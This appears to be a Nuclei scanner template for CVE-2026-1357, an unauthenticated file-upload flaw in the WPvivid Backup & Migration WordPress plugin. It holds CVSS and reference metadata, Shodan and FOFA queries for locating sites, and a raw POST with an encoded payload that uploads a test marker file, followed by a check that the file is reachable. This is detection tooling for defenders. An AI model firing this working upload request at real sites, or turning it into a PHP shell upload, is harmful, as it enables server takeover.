id: CVE-2026-1357

info:
  name: WPvivid Backup & Migration <= 0.9.123 - Arbitrary File Upload
  author: omarkurt
  severity: critical
  description: |
    WPvivid Backup & Migration plugin for WordPress <= 0.9.123 contains an unauthenticated arbitrary file upload vulnerability caused by improper error handling in RSA decryption and lack of path sanitization, letting unauthenticated attackers upload arbitrary PHP files and achieve remote code execution via wpvivid_action=send_to_site parameter.
  impact: |
    Unauthenticated attackers can upload arbitrary PHP files and execute remote code, leading to full server compromise.
  remediation: |
    Update to the latest version of WPvivid Backup & Migration plugin.
  reference:
    - https://vulnerabletarget.com/VT-2026-1357
    - https://github.com/LucasM0ntes/POC-CVE-2026-1357
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/e5af0317-ef46-4744-9752-74ce228b5f37
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1357
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-1357
    epss-score: 0.16794
    epss-percentile: 0.95098
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: wpvivid
    product: wpvivid-backuprestore
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-content/plugins/wpvivid-backuprestore"
  tags: cve,cve2026,wordpress,wp,wp-plugin,wpvivid,file-upload,rce,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        wpvivid_action=send_to_site&wpvivid_content=MDAzQUJDMDAwMDAwMDAwMDAwMDExMDUGpYqxgOo0%2FZM3%2BLE%2B23CYS%2BI8Sbr6wwwU6dJweFxMk%2BOogH3GIpPZZMrm72oUS3vnrlf0AXv1vmGVBIbLo3QcQs%2B4JU7cLQw1kWByCFlYkpHcBuzxjEbVtT8VSdFgb6NLW6cpP4BdWT8bJx%2F%2FAOO09m3EFtf2sOcE%2BJjFJAew%2BELondwDkz3u5mssxGaQrlvWgaIlmPwz3FZx8dWC%2FHy7k4P3S5IJ7JV0tefjHJKCOzjPHngkZENu1uI2LmE6JaeF7XdXJCcmFOrNex4yJgIO0raawogHW457fM4wXKDnrM3bwxeLn5KwvAgadaTj4F9zWHxnjBmpa%2BtIaohISVcA5%2BGv6cAA95rzOoXBGUaI

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":"success"'
        internal: true

      - type: status
        status:
          - 200
        internal: true

  - raw:
      - |
        GET /wp-content/uploads/vt-nuclei-test.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CVE-2026-1357-nuclei-verification-test"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f8c1b28f2c845fab8336da086d8b8d79f5ca55ed2bf5c24bbcf97b0158b1ea6b02202d1a4cd2ab270fc5aec32ee32eceda906c814742a27a50346b8cb9f072a750c9:922c64590222798bb761d5b6d8e72950